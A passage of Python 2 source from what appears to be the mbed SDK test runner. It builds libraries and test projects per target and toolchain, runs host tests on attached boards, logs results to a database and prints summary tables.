self.db_logger_build_id = None # Build ID (database index of build_id table)
# Let's connect to database to set up credentials and confirm database is ready
if self.db_logger:
self.db_logger.connect_url(self.opts_db_url) # Save db access info inside db_logger object
if self.db_logger.is_connected():
# Get hostname and uname so we can use it as build description
# when creating new build_id in external database
(_hostname, _uname) = self.db_logger.get_hostname()
_host_location = os.path.dirname(os.path.abspath(__file__))
build_id_type = None if self.opts_only_build_tests is None else self.db_logger.BUILD_ID_TYPE_BUILD_ONLY
self.db_logger_build_id = self.db_logger.get_next_build_id(_hostname, desc=_uname, location=_host_location, type=build_id_type)
self.db_logger.disconnect()
def dump_options(self):
""" Function returns data structure with common settings passed to SingelTestRunner
It can be used for example to fill _extra fields in database storing test suite single run data
Example:
data = self.dump_options()
or
data_str = json.dumps(self.dump_options())
"""
result = {"db_url" : str(self.opts_db_url),
"log_file_name" : str(self.opts_log_file_name),
"shuffle_test_order" : str(self.opts_shuffle_test_order),
"shuffle_test_seed" : str(self.opts_shuffle_test_seed),
"test_by_names" : str(self.opts_test_by_names),
"peripheral_by_names" : str(self.opts_peripheral_by_names),
"test_only_peripheral" : str(self.opts_test_only_peripheral),
"test_only_common" : str(self.opts_test_only_common),
"verbose" : str(self.opts_verbose),
"firmware_global_name" : str(self.opts_firmware_global_name),
"only_build_tests" : str(self.opts_only_build_tests),
"copy_method" : str(self.opts_copy_method),
"mut_reset_type" : str(self.opts_mut_reset_type),
"jobs" : str(self.opts_jobs),
"extend_test_timeout" : str(self.opts_extend_test_timeout),
"_dummy" : ''
}
return result
def shuffle_random_func(self):
return self.shuffle_random_seed
def is_shuffle_seed_float(self):
""" return true if function parameter can be converted to float
"""
result = True
try:
float(self.shuffle_random_seed)
except ValueError:
result = False
return result
# This will store target / toolchain specific properties
test_suite_properties_ext = {} # target : toolchain
# Here we store test results
test_summary = []
# Here we store test results in extended data structure
test_summary_ext = {}
execute_thread_slice_lock = Lock()
def execute_thread_slice(self, q, target, toolchains, clean, test_ids, build_report, build_properties):
for toolchain in toolchains:
tt_id = "%s::%s" % (toolchain, target)
T = TARGET_MAP[target]
# print target, toolchain
# Test suite properties returned to external tools like CI
test_suite_properties = {
'jobs': self.opts_jobs,
'clean': clean,
'target': target,
'vendor': T.extra_labels[0],
'test_ids': ', '.join(test_ids),
'toolchain': toolchain,
'shuffle_random_seed': self.shuffle_random_seed
}
# print '=== %s::%s ===' % (target, toolchain)
# Let's build our test
if target not in TARGET_MAP:
print self.logger.log_line(self.logger.LogType.NOTIF, 'Skipped tests for %s target. Target platform not found'% (target))
continue
build_mbed_libs_options = ["analyze"] if self.opts_goanna_for_mbed_sdk else None
clean_mbed_libs_options = True if self.opts_goanna_for_mbed_sdk or clean or self.opts_clean else None
try:
build_mbed_libs_result = build_mbed_libs(T,
toolchain,
options=build_mbed_libs_options,
clean=clean_mbed_libs_options,
verbose=self.opts_verbose,
jobs=self.opts_jobs,
report=build_report,
properties=build_properties)
if not build_mbed_libs_result:
print self.logger.log_line(self.logger.LogType.NOTIF, 'Skipped tests for %s target. Toolchain %s is not yet supported for this target'% (T.name, toolchain))
continue
except ToolException:
print self.logger.log_line(self.logger.LogType.ERROR, 'There were errors while building MBED libs for %s using %s'% (target, toolchain))
continue
build_dir = join(BUILD_DIR, "test", target, toolchain)
test_suite_properties['build_mbed_libs_result'] = build_mbed_libs_result
test_suite_properties['build_dir'] = build_dir
test_suite_properties['skipped'] = []
# Enumerate through all tests and shuffle test order if requested
test_map_keys = sorted(TEST_MAP.keys())
if self.opts_shuffle_test_order:
random.shuffle(test_map_keys, self.shuffle_random_func)
                # Update database with shuffle seed if applicable
if self.db_logger:
                    self.db_logger.reconnect()
if self.db_logger.is_connected():
self.db_logger.update_build_id_info(self.db_logger_build_id, _shuffle_seed=self.shuffle_random_func())
                        self.db_logger.disconnect()
if self.db_logger:
                self.db_logger.reconnect()
if self.db_logger.is_connected():
# Update MUTs and Test Specification in database
self.db_logger.update_build_id_info(self.db_logger_build_id, _muts=self.muts, _test_spec=self.test_spec)
# Update Extra information in database (some options passed to test suite)
self.db_logger.update_build_id_info(self.db_logger_build_id, _extra=json.dumps(self.dump_options()))
                    self.db_logger.disconnect()
valid_test_map_keys = self.get_valid_tests(test_map_keys, target, toolchain, test_ids, self.opts_include_non_automated)
skipped_test_map_keys = self.get_skipped_tests(test_map_keys, valid_test_map_keys)
for skipped_test_id in skipped_test_map_keys:
test_suite_properties['skipped'].append(skipped_test_id)
# First pass through all tests and determine which libraries need to be built
libraries = []
for test_id in valid_test_map_keys:
test = TEST_MAP[test_id]
# Detect which lib should be added to test
                # Some libs have to be compiled, like RTOS or ETH
for lib in LIBRARIES:
if lib['build_dir'] in test.dependencies and lib['id'] not in libraries:
libraries.append(lib['id'])
build_project_options = ["analyze"] if self.opts_goanna_for_tests else None
clean_project_options = True if self.opts_goanna_for_tests or clean or self.opts_clean else None
# Build all required libraries
for lib_id in libraries:
try:
build_lib(lib_id,
T,
toolchain,
options=build_project_options,
verbose=self.opts_verbose,
clean=clean_mbed_libs_options,
jobs=self.opts_jobs,
report=build_report,
properties=build_properties)
except ToolException:
print self.logger.log_line(self.logger.LogType.ERROR, 'There were errors while building library %s'% (lib_id))
continue
for test_id in valid_test_map_keys:
test = TEST_MAP[test_id]
test_suite_properties['test.libs.%s.%s.%s'% (target, toolchain, test_id)] = ', '.join(libraries)
                # TODO: move these two loops below into a separate function
INC_DIRS = []
for lib_id in libraries:
if 'inc_dirs_ext' in LIBRARY_MAP[lib_id] and LIBRARY_MAP[lib_id]['inc_dirs_ext']:
INC_DIRS.extend(LIBRARY_MAP[lib_id]['inc_dirs_ext'])
MACROS = []
for lib_id in libraries:
if 'macros' in LIBRARY_MAP[lib_id] and LIBRARY_MAP[lib_id]['macros']:
MACROS.extend(LIBRARY_MAP[lib_id]['macros'])
MACROS.append('TEST_SUITE_TARGET_NAME="%s"'% target)
MACROS.append('TEST_SUITE_TEST_ID="%s"'% test_id)
test_uuid = uuid.uuid4()
MACROS.append('TEST_SUITE_UUID="%s"'% str(test_uuid))
# Prepare extended test results data structure (it can be used to generate detailed test report)
if target not in self.test_summary_ext:
self.test_summary_ext[target] = {} # test_summary_ext : toolchain
if toolchain not in self.test_summary_ext[target]:
self.test_summary_ext[target][toolchain] = {} # test_summary_ext : toolchain : target
tt_test_id = "%s::%s::%s" % (toolchain, target, test_id) # For logging only
project_name = self.opts_firmware_global_name if self.opts_firmware_global_name else None
try:
path = build_project(test.source_dir,
join(build_dir, test_id),
T,
toolchain,
test.dependencies,
options=build_project_options,
clean=clean_project_options,
verbose=self.opts_verbose,
name=project_name,
macros=MACROS,
inc_dirs=INC_DIRS,
jobs=self.opts_jobs,
report=build_report,
properties=build_properties,
project_id=test_id,
project_description=test.get_description())
except Exception, e:
project_name_str = project_name if project_name is not None else test_id
test_result = self.TEST_RESULT_FAIL
if isinstance(e, ToolException):
print self.logger.log_line(self.logger.LogType.ERROR, 'There were errors while building project %s'% (project_name_str))
test_result = self.TEST_RESULT_BUILD_FAILED
elif isinstance(e, NotSupportedException):
print self.logger.log_line(self.logger.LogType.INFO, 'The project %s is not supported'% (project_name_str))
test_result = self.TEST_RESULT_NOT_SUPPORTED
# Append test results to global test summary
self.test_summary.append(
(test_result, target, toolchain, test_id, test.get_description(), 0, 0, '-')
)
# Add detailed test result to test summary structure
if test_id not in self.test_summary_ext[target][toolchain]:
self.test_summary_ext[target][toolchain][test_id] = []
self.test_summary_ext[target][toolchain][test_id].append({ 0: {
'result' : test_result,
'output' : '',
'target_name' : target,
'target_name_unique': target,
'toolchain_name' : toolchain,
'id' : test_id,
'description' : test.get_description(),
'elapsed_time' : 0,
'duration' : 0,
'copy_method' : None
}})
continue
if self.opts_only_build_tests:
# With this option we are skipping testing phase
continue
# Test duration can be increased by global value
test_duration = test.duration
if self.opts_extend_test_timeout is not None:
test_duration += self.opts_extend_test_timeout
                # For an automated test the duration acts as a timeout after
# which the test gets interrupted
test_spec = self.shape_test_request(target, path, test_id, test_duration)
test_loops = self.get_test_loop_count(test_id)
test_suite_properties['test.duration.%s.%s.%s'% (target, toolchain, test_id)] = test_duration
test_suite_properties['test.loops.%s.%s.%s'% (target, toolchain, test_id)] = test_loops
test_suite_properties['test.path.%s.%s.%s'% (target, toolchain, test_id)] = path
# read MUTs, test specification and perform tests
handle_results = self.handle(test_spec, target, toolchain, test_loops=test_loops)
if handle_results is None:
continue
for handle_result in handle_results:
if handle_result:
single_test_result, detailed_test_results = handle_result
else:
continue
# Append test results to global test summary
if single_test_result is not None:
self.test_summary.append(single_test_result)
# Add detailed test result to test summary structure
                    if test_id not in self.test_summary_ext[target][toolchain]:
                        self.test_summary_ext[target][toolchain][test_id] = []
append_test_result = detailed_test_results
# If waterfall and consolidate-waterfall options are enabled,
# only include the last test result in the report.
if self.opts_waterfall_test and self.opts_consolidate_waterfall_test:
append_test_result = {0: detailed_test_results[len(detailed_test_results) - 1]}
self.test_summary_ext[target][toolchain][test_id].append(append_test_result)
test_suite_properties['skipped'] = ', '.join(test_suite_properties['skipped'])
self.test_suite_properties_ext[target][toolchain] = test_suite_properties
q.put(target + '_'.join(toolchains))
return
def execute(self):
clean = self.test_spec.get('clean', False)
test_ids = self.test_spec.get('test_ids', [])
q = Queue()
        # Generate seed for shuffle if a seed is not provided on the command line
self.shuffle_random_seed = round(random.random(), self.SHUFFLE_SEED_ROUND)
if self.opts_shuffle_test_seed is not None and self.is_shuffle_seed_float():
self.shuffle_random_seed = round(float(self.opts_shuffle_test_seed), self.SHUFFLE_SEED_ROUND)
if self.opts_parallel_test_exec:
###################################################################
# Experimental, parallel test execution per singletest instance.
###################################################################
            execute_threads = []  # Threads used to build mbed SDK, libs, test cases and execute tests
# Note: We are building here in parallel for each target separately!
# So we are not building the same thing multiple times and compilers
# in separate threads do not collide.
# Inside execute_thread_slice() function function handle() will be called to
# get information about available MUTs (per target).
for target, toolchains in self.test_spec['targets'].iteritems():
self.test_suite_properties_ext[target] = {}
t = threading.Thread(target=self.execute_thread_slice, args = (q, target, toolchains, clean, test_ids, self.build_report, self.build_properties))
t.daemon = True
t.start()
execute_threads.append(t)
for t in execute_threads:
                q.get()  # wait on the queue instead of t.join(), since threads may finish in any order
else:
# Serialized (not parallel) test execution
for target, toolchains in self.test_spec['targets'].iteritems():
if target not in self.test_suite_properties_ext:
self.test_suite_properties_ext[target] = {}
self.execute_thread_slice(q, target, toolchains, clean, test_ids, self.build_report, self.build_properties)
q.get()
if self.db_logger:
            self.db_logger.reconnect()
if self.db_logger.is_connected():
self.db_logger.update_build_id_info(self.db_logger_build_id, _status_fk=self.db_logger.BUILD_ID_STATUS_COMPLETED)
                self.db_logger.disconnect()
return self.test_summary, self.shuffle_random_seed, self.test_summary_ext, self.test_suite_properties_ext, self.build_report, self.build_properties
def get_valid_tests(self, test_map_keys, target, toolchain, test_ids, include_non_automated):
valid_test_map_keys = []
for test_id in test_map_keys:
test = TEST_MAP[test_id]
if self.opts_test_by_names and test_id not in self.opts_test_by_names.split(','):
continue
if test_ids and test_id not in test_ids:
continue
if self.opts_test_only_peripheral and not test.peripherals:
if self.opts_verbose_skipped_tests:
print self.logger.log_line(self.logger.LogType.INFO, 'Common test skipped for target %s'% (target))
continue
if self.opts_peripheral_by_names and test.peripherals and not len([i for i in test.peripherals if i in self.opts_peripheral_by_names.split(',')]):
# We will skip tests not forced with -p option
if self.opts_verbose_skipped_tests:
print self.logger.log_line(self.logger.LogType.INFO, 'Common test skipped for target %s'% (target))
continue
if self.opts_test_only_common and test.peripherals:
if self.opts_verbose_skipped_tests:
print self.logger.log_line(self.logger.LogType.INFO, 'Peripheral test skipped for target %s'% (target))
continue
if not include_non_automated and not test.automated:
if self.opts_verbose_skipped_tests:
print self.logger.log_line(self.logger.LogType.INFO, 'Non automated test skipped for target %s'% (target))
continue
if test.is_supported(target, toolchain):
if test.peripherals is None and self.opts_only_build_tests:
                    # When users use the 'build only' flag and the test does not have
                    # specified peripherals, we can allow test building by default
pass
elif self.opts_peripheral_by_names and test_id not in self.opts_peripheral_by_names.split(','):
# If we force peripheral with option -p we expect test
# to pass even if peripheral is not in MUTs file.
pass
elif not self.is_peripherals_available(target, test.peripherals):
if self.opts_verbose_skipped_tests:
if test.peripherals:
print self.logger.log_line(self.logger.LogType.INFO, 'Peripheral %s test skipped for target %s'% (",".join(test.peripherals), target))
else:
print self.logger.log_line(self.logger.LogType.INFO, 'Test %s skipped for target %s'% (test_id, target))
continue
# The test has made it through all the filters, so add it to the valid tests list
valid_test_map_keys.append(test_id)
return valid_test_map_keys
def get_skipped_tests(self, all_test_map_keys, valid_test_map_keys):
# NOTE: This will not preserve order
return list(set(all_test_map_keys) - set(valid_test_map_keys))
def generate_test_summary_by_target(self, test_summary, shuffle_seed=None):
""" Prints well-formed summary with results (SQL table like)
            table shows test x toolchain test result matrix
"""
RESULT_INDEX = 0
TARGET_INDEX = 1
TOOLCHAIN_INDEX = 2
TEST_INDEX = 3
DESC_INDEX = 4
unique_targets = get_unique_value_from_summary(test_summary, TARGET_INDEX)
unique_tests = get_unique_value_from_summary(test_summary, TEST_INDEX)
unique_test_desc = get_unique_value_from_summary_ext(test_summary, TEST_INDEX, DESC_INDEX)
unique_toolchains = get_unique_value_from_summary(test_summary, TOOLCHAIN_INDEX)
result = "Test summary:\n"
for target in unique_targets:
result_dict = {} # test : { toolchain : result }
unique_target_toolchains = []
for test in test_summary:
if test[TARGET_INDEX] == target:
if test[TOOLCHAIN_INDEX] not in unique_target_toolchains:
unique_target_toolchains.append(test[TOOLCHAIN_INDEX])
if test[TEST_INDEX] not in result_dict:
result_dict[test[TEST_INDEX]] = {}
result_dict[test[TEST_INDEX]][test[TOOLCHAIN_INDEX]] = test[RESULT_INDEX]
pt_cols = ["Target", "Test ID", "Test Description"] + unique_target_toolchains
pt = PrettyTable(pt_cols)
for col in pt_cols:
pt.align[col] = "l"
pt.padding_width = 1 # One space between column edges and contents (default)
for test in unique_tests:
if test in result_dict:
test_results = result_dict[test]
if test in unique_test_desc:
row = [target, test, unique_test_desc[test]]
for toolchain in unique_toolchains:
if toolchain in test_results:
row.append(test_results[toolchain])
pt.add_row(row)
result += pt.get_string()
shuffle_seed_text = "Shuffle Seed: %.*f"% (self.SHUFFLE_SEED_ROUND,
shuffle_seed if shuffle_seed else self.shuffle_random_seed)
result += "\n%s"% (shuffle_seed_text if self.opts_shuffle_test_order else '')
return result
def generate_test_summary(self, test_summary, shuffle_seed=None):
""" Prints well-formed summary with results (SQL table like)
            table shows the target x test results matrix
"""
        success_code = 0    # Success code that can be later returned to the caller
result = "Test summary:\n"
# Pretty table package is used to print results
pt = PrettyTable(["Result", "Target", "Toolchain", "Test ID", "Test Description",
"Elapsed Time (sec)", "Timeout (sec)", "Loops"])
pt.align["Result"] = "l" # Left align
pt.align["Target"] = "l" # Left align
pt.align["Toolchain"] = "l" # Left align
pt.align["Test ID"] = "l" # Left align
pt.align["Test Description"] = "l" # Left align
pt.padding_width = 1 # One space between column edges and contents (default)
result_dict = {self.TEST_RESULT_OK : 0,
self.TEST_RESULT_FAIL : 0,
self.TEST_RESULT_ERROR : 0,
self.TEST_RESULT_UNDEF : 0,
self.TEST_RESULT_IOERR_COPY : 0,
self.TEST_RESULT_IOERR_DISK : 0,
self.TEST_RESULT_IOERR_SERIAL : 0,
self.TEST_RESULT_NO_IMAGE : 0,
self.TEST_RESULT_TIMEOUT : 0,
self.TEST_RESULT_MBED_ASSERT : 0,
self.TEST_RESULT_BUILD_FAILED : 0,
self.TEST_RESULT_NOT_SUPPORTED : 0
}
for test in test_summary:
if test[0] in result_dict:
result_dict[test[0]] += 1
pt.add_row(test)
result += pt.get_string()
result += "\n"
# Print result count
result += "Result: " + ' / '.join(['%s %s' % (value, key) for (key, value) in {k: v for k, v in result_dict.items() if v != 0}.iteritems()])
shuffle_seed_text = "Shuffle Seed: %.*f\n"% (self.SHUFFLE_SEED_ROUND,
shuffle_seed if shuffle_seed else self.shuffle_random_seed)
result += "\n%s"% (shuffle_seed_text if self.opts_shuffle_test_order else '')
return result
def test_loop_list_to_dict(self, test_loops_str):
""" Transforms test_id=X,test_id=X,test_id=X into dictionary {test_id : test_id_loops_count}
"""
result = {}
if test_loops_str:
test_loops = test_loops_str.split(',')
for test_loop in test_loops:
test_loop_count = test_loop.split('=')
if len(test_loop_count) == 2:
_test_id, _test_loops = test_loop_count
try:
_test_loops = int(_test_loops)
except:
continue
result[_test_id] = _test_loops
return result
def get_test_loop_count(self, test_id):
""" This function returns no. of loops per test (deducted by test_id_.
If test is not in list of redefined loop counts it will use default value.
"""
result = self.GLOBAL_LOOPS_COUNT
if test_id in self.TEST_LOOPS_DICT:
result = self.TEST_LOOPS_DICT[test_id]
return result
def delete_file(self, file_path):
""" Remove file from the system
"""
result = True
resutl_msg = ""
try:
os.remove(file_path)
except Exception, e:
            result_msg = e
result = False
        return result, result_msg
def handle_mut(self, mut, data, target_name, toolchain_name, test_loops=1):
""" Test is being invoked for given MUT.
"""
# Get test information, image and test timeout
test_id = data['test_id']
test = TEST_MAP[test_id]
test_description = TEST_MAP[test_id].get_description()
image = data["image"]
duration = data.get("duration", 10)
if mut is None:
print "Error: No Mbed available: MUT[%s]" % data['mcu']
return None
mcu = mut['mcu']
copy_method = mut.get('copy_method') # Available board configuration selection e.g. core selection etc.
if self.db_logger:
self.db_logger.reconnect()
selected_copy_method = self.opts_copy_method if copy_method is None else copy_method
# Tests can be looped so test results must be stored for the same test
test_all_result = []
# Test results for one test ran few times
detailed_test_results = {} # { Loop_number: { results ... } }
for test_index in range(test_loops):
# If mbedls is available and we are auto detecting MUT info,
            # update MUT info (mount point may have changed)
if get_module_avail('mbed_lstools') and self.opts_auto_detect:
platform_name_filter = [mcu]
muts_list = {}
found = False
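                # keep retrying auto-detection (up to 60 attempts, ~3 s apart);
                # detected MUTs are indexed from 1, so wait for entry 1 to appear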
for i in range(0, 60):
print('Looking for %s with MBEDLS' % mcu)
muts_list = get_autodetected_MUTS_list(platform_name_filter=platform_name_filter)
if 1 not in muts_list:
sleep(3)
else:
found = True
break
if not found:
print "Error: mbed not found with MBEDLS: %s" % data['mcu']
return None
else:
mut = muts_list[1]
disk = mut.get('disk')
port = mut.get('port')
if disk is None or port is None:
return None
target_by_mcu = TARGET_MAP[mut['mcu']]
target_name_unique = mut['mcu_unique'] if 'mcu_unique' in mut else mut['mcu']
# Some extra stuff can be declared in MUTs structure
reset_type = mut.get('reset_type') # reboot.txt, reset.txt, shutdown.txt
reset_tout = mut.get('reset_tout') # COPY_IMAGE -> RESET_PROC -> SLEEP(RESET_TOUT)
# When the build and test system were separate, this was relative to a
# base network folder base path: join(NETWORK_BASE_PATH, )
image_path = image
# Host test execution
start_host_exec_time = time()
single_test_result = self.TEST_RESULT_UNDEF # single test run result
_copy_method = selected_copy_method
if not exists(image_path):
single_test_result = self.TEST_RESULT_NO_IMAGE
elapsed_time = 0
single_test_output = self.logger.log_line(self.logger.LogType.ERROR, 'Image file does not exist: %s'% image_path)
print single_test_output
else:
# Host test execution
start_host_exec_time = time()
host_test_verbose = self.opts_verbose_test_result_only or self.opts_verbose
host_test_reset = self.opts_mut_reset_type if reset_type is None else reset_type
host_test_result = self.run_host_test(test.host_test,
image_path, disk, port, duration,
micro=target_name,
verbose=host_test_verbose,
reset=host_test_reset,
reset_tout=reset_tout,
copy_method=selected_copy_method,
program_cycle_s=target_by_mcu.program_cycle_s)
single_test_result, single_test_output, single_testduration, single_timeout = host_test_result
# Store test result
test_all_result.append(single_test_result)
total_elapsed_time = time() - start_host_exec_time # Test time with copy (flashing) / reset
            elapsed_time = single_testduration   # Time of single test case execution after reset
detailed_test_results[test_index] = {
'result' : single_test_result,
'output' : single_test_output,
'target_name' : target_name,
'target_name_unique' : target_name_unique,
'toolchain_name' : toolchain_name,
'id' : test_id,
'description' : test_description,
'elapsed_time' : round(elapsed_time, 2),
'duration' : single_timeout,
'copy_method' : _copy_method,
}
print self.print_test_result(single_test_result, target_name_unique, toolchain_name,
test_id, test_description, elapsed_time, single_timeout)
# Update database entries for ongoing test
if self.db_logger and self.db_logger.is_connected():
test_type = 'SingleTest'
self.db_logger.insert_test_entry(self.db_logger_build_id,
target_name,
toolchain_name,
test_type,
test_id,
single_test_result,
single_test_output,
elapsed_time,
single_timeout,
test_index)
# If we perform waterfall test we test until we get OK and we stop testing
if self.opts_waterfall_test and single_test_result == self.TEST_RESULT_OK:
break
if self.db_logger:
self.db_logger.disconnect()
return (self.shape_global_test_loop_result(test_all_result, self.opts_waterfall_test and self.opts_consolidate_waterfall_test),
target_name_unique,
toolchain_name,
test_id,
test_description,
round(elapsed_time, 2),
single_timeout,
self.shape_test_loop_ok_result_count(test_all_result)), detailed_test_results
def handle(self, test_spec, target_name, toolchain_name, test_loops=1):
""" Function determines MUT's mbed disk/port and copies binary to
target.
"""
handle_results = []
data = json.loads(test_spec)
# Find a suitable MUT:
mut = None
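        # Pick a MUT whose MCU matches the requested target (last match wins)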
for id, m in self.muts.iteritems():
if m['mcu'] == data['mcu']:
mut = m
handle_result = self.handle_mut(mut, data, target_name, toolchain_name, test_loops=test_loops)
handle_results.append(handle_result)
return handle_results
def print_test_result(self, test_result, target_name, toolchain_name,
test_id, test_description, elapsed_time, duration):
""" Use specific convention to print test result and related data
"""
tokens = []
tokens.append("TargetTest")
tokens.append(target_name)
tokens.append(toolchain_name)
tokens.append(test_id)
tokens.append(test_description)
separator = "::"
time_info = " in %.2f of %d sec" % (round(elapsed_time, 2), duration)
result = separator.join(tokens) + " [" + test_result +"]" + time_info
return Fore.MAGENTA + result + Fore.RESET
def shape_test_loop_ok_result_count(self, test_all_result):
""" Reformats list of results to simple string
"""
test_loop_count = len(test_all_result)
test_loop_ok_result = test_all_result.count(self.TEST_RESULT_OK)
return "%d/%d"% (test_loop_ok_result, test_loop_count)
def shape_global_test_loop_result(self, test_all_result, waterfall_and_consolidate):
""" Reformats list of results to simple string
"""
result = self.TEST_RESULT_FAIL
if all(test_all_result[0] == res for res in test_all_result):
result = test_all_result[0]
elif waterfall_and_consolidate and any(res == self.TEST_RESULT_OK for res in test_all_result):
result = self.TEST_RESULT_OK
return result
def run_host_test(self, name, image_path, disk, port, duration,
micro=None, reset=None, reset_tout=None,
verbose=False, copy_method=None, program_cycle_s=None):
""" Function creates new process with host test configured with particular test case.
Function also is pooling for serial port activity from process to catch all data
printed by test runner and host test during test execution
"""
def get_char_from_queue(obs):
""" Get character from queue safe way
"""
try:
c = obs.queue.get(block=True, timeout=0.5)
except Empty, _:
c = None
return c
def filter_queue_char(c):
""" Filters out non ASCII characters from serial port
"""
if ord(c) not in range(128):
c = ' '
return c
def get_test_result(output):
""" Parse test 'output' data
"""
result = self.TEST_RESULT_TIMEOUT
for line in "".join(output).splitlines():
search_result = self.RE_DETECT_TESTCASE_RESULT.search(line)
if search_result and len(search_result.groups()):
result = self.TEST_RESULT_MAPPING[search_result.groups(0)[0]]
break
return result
def get_auto_property_value(property_name, line):
""" Scans auto detection line from MUT and returns scanned parameter 'property_name'
Returns string
"""
result = None
if re.search("HOST: Property '%s'"% property_name, line) is not None:
property = re.search("HOST: Property '%s' = '([\w\d _]+)'"% property_name, line)
if property is not None and len(property.groups()) == 1:
result = property.groups()[0]
return result
# print "{%s} port:%s disk:%s" % (name, port, disk),
cmd = ["python",
'%s.py'% name,
'-d', disk,
'-f', '"%s"'% image_path,
'-p', port,
'-t', str(duration),
'-C', str(program_cycle_s)]
if get_module_avail('mbed_lstools') and self.opts_auto_detect:
cmd += ['--auto']
# Add extra parameters to host_test
if copy_method is not None:
cmd += ["-c", copy_method]
if micro is not None:
cmd += ["-m", micro]
if reset is not None:
cmd += ["-r", reset]
if reset_tout is not None:
cmd += ["-R", str(reset_tout)]
if verbose:
print Fore.MAGENTA + "Executing '" + " ".join(cmd) + "'" + Fore.RESET
print "Test::Output::Start"
proc = Popen(cmd, stdout=PIPE, cwd=HOST_TESTS)
obs = ProcessObserver(proc)
update_once_flag = {} # Stores flags checking if some auto-parameter was already set
line = ''
output = []
start_time = time()
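        # Poll host test output for at most twice the test duration; the timer
        # restarts when the host test reports a target reset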
while (time() - start_time) < (2 * duration):
c = get_char_from_queue(obs)
if c:
if verbose:
sys.stdout.write(c)
c = filter_queue_char(c)
output.append(c)
# Give the mbed under test a way to communicate the end of the test
if c in ['\n', '\r']:
# Checking for auto-detection information from the test about MUT reset moment
if 'reset_target' not in update_once_flag and "HOST: Reset target..." in line:
# We will update this marker only once to prevent multiple time resets
update_once_flag['reset_target'] = True
start_time = time()
# Checking for auto-detection information from the test about timeout
auto_timeout_val = get_auto_property_value('timeout', line)
if 'timeout' not in update_once_flag and auto_timeout_val is not None:
# We will update this marker only once to prevent multiple time resets
update_once_flag['timeout'] = True
duration = int(auto_timeout_val)
# Detect mbed assert:
if 'mbed assertation failed: ' in line:
output.append('{{mbed_assert}}')
break
# Check for test end
if '{end}' in line:
break
line = ''
else:
line += c
end_time = time()
testcase_duration = end_time - start_time # Test case duration from reset to {end}
c = get_char_from_queue(obs)
if c:
if verbose:
sys.stdout.write(c)
c = filter_queue_char(c)
output.append(c)
if verbose:
print "Test::Output::Finish"
# Stop test process
obs.stop()
result = get_test_result(output)
return (result, "".join(output), testcase_duration, duration)
def is_peripherals_available(self, target_mcu_name, peripherals=None):
""" Checks if specified target should run specific peripheral test case defined in MUTs file
"""
if peripherals is not None:
peripherals = set(peripherals)
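        # a MUT matches only if its MCU name matches and it declares every
        # required peripheral (subset check below)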
for id, mut in self.muts.iteritems():
# Target MCU name check
if mut["mcu"] != target_mcu_name:
continue
# Peripherals check
if peripherals is not None:
if 'peripherals' not in mut:
continue
if not peripherals.issubset(set(mut['peripherals'])):
continue
return True
return False
def shape_test_request(self, mcu, image_path, test_id, duration=10):
""" Function prepares JSON structure describing test specification
"""
test_spec = {
"mcu": mcu,
"image": image_path,
"duration": duration,
"test_id": test_id,
}
return json.dumps(test_spec)
def get_unique_value_from_summary(test_summary, index):
""" Gets list of unique target names
"""
result = []
for test in test_summary:
target_name = test[index]
if target_name not in result:
result.append(target_name)
return sorted(result)
def get_unique_value_from_summary_ext(test_summary, index_key, index_val):
""" Gets list of unique target names and return dictionary
"""
result = {}
for test in test_summary:
key = test[index_key]
val = test[index_val]
if key not in result:
result[key] = val
return result
def show_json_file_format_error(json_spec_filename, line, column):
""" Prints JSON broken content
"""
with open(json_spec_filename) as data_file:
line_no = 1
for json_line in data_file:
if line_no + 5 >= line: # Print last few lines before error
print 'Line %d:\t'%line_no + json_line, # Prints line
if line_no == line:
print ' ' * len('Line %d:'%line_no) + '\t', '-' * (column-1) + '^'
break
line_no += 1
def json_format_error_defect_pos(json_error_msg):
""" Gets first error line and column in JSON file format.
Parsed from exception thrown by json.loads() string
"""
result = None
line, column = 0, 0
# Line value search
line_search = re.search('line [0-9]+', json_error_msg)
if line_search is not None:
ls = line_search.group().split(' ')
if len(ls) == 2:
line = int(ls[1])
# Column position search
column_search = re.search('column [0-9]+', json_error_msg)
if column_search is not None:
cs = column_search.group().split(' ')
if len(cs) == 2:
column = int(cs[1])
result = [line, column]
return result
def get_json_data_from_file(json_spec_filename, verbose=False):
""" Loads from file JSON formatted string to data structure
"""
result = None
try:
with open(json_spec_filename) as data_file:
try:
result = json.load(data_file)
except ValueError as json_error_msg:
result = None
print 'JSON file %s parsing failed. Reason: %s' % (json_spec_filename, json_error_msg)
# We can print where error occurred inside JSON file if we can parse exception msg
json_format_defect_pos = json_format_error_defect_pos(str(json_error_msg))
if json_format_defect_pos is not None:
line = json_format_defect_pos[0]
column = json_format_defect_pos[1]
print
show_json_file_format_error(json_spec_filename, line, column)
except IOError as fileopen_error_msg:
print 'JSON file %s not opened. Reason: %s'% (json_spec_filename, fileopen_error_msg)
print
if verbose and result:
pp = pprint.PrettyPrinter(indent=4)
pp.pprint(result)
return result
def print_muts_configuration_from_json(json_data, join_delim=", ", platform_filter=None):
""" Prints MUTs configuration passed to test script for verboseness
"""
muts_info_cols = []
# We need to check all unique properties for each defined MUT
for k in json_data:
mut_info = json_data[k]
for mut_property in mut_info:
if mut_property not in muts_info_cols:
muts_info_cols.append(mut_property)
# Prepare pretty table object to display all MUTs
pt_cols = ["index"] + muts_info_cols
pt = PrettyTable(pt_cols)
for col in pt_cols:
pt.align[col] = "l"
# Add rows to pretty print object
for k in json_data:
row = [k]
mut_info = json_data[k]
add_row = True
if platform_filter and 'mcu' in mut_info:
add_row = re.search(platform_filter, mut_info['mcu']) is not None
if add_row:
for col in muts_info_cols:
cell_val = mut_info[col] if col in mut_info else None
if type(cell_val) == ListType:
cell_val = join_delim.join(cell_val)
row.append(cell_val)
pt.add_row(row)
return pt.get_string()
def print_test_configuration_from_json(json_data, join_delim=", "):
""" Prints test specification configuration passed to test script for verboseness
"""
toolchains_info_cols = []
# We need to check all toolchains for each device
for k in json_data:
# k should be 'targets'
targets = json_data[k]
for target in targets:
toolchains = targets[target]
for toolchain in toolchains:
if toolchain not in toolchains_info_cols:
toolchains_info_cols.append(toolchain)
# Prepare pretty table object to display test specification
pt_cols = ["mcu"] + sorted(toolchains_info_cols)
pt = PrettyTable(pt_cols)
for col in pt_cols:
pt.align[col] = "l"
# { target : [conflicted toolchains] }
toolchain_conflicts = {}
toolchain_path_conflicts = []
for k in json_data:
# k should be 'targets'
targets = json_data[k]
for target in targets:
target_supported_toolchains = get_target_supported_toolchains(target)
if not target_supported_toolchains:
target_supported_toolchains = []
target_name = target if target in TARGET_MAP else "%s*"% target
row = [target_name]
toolchains = targets[target]
for toolchain in sorted(toolchains_info_cols):
# Check for conflicts: target vs toolchain
conflict = False
conflict_path = False
if toolchain in toolchains:
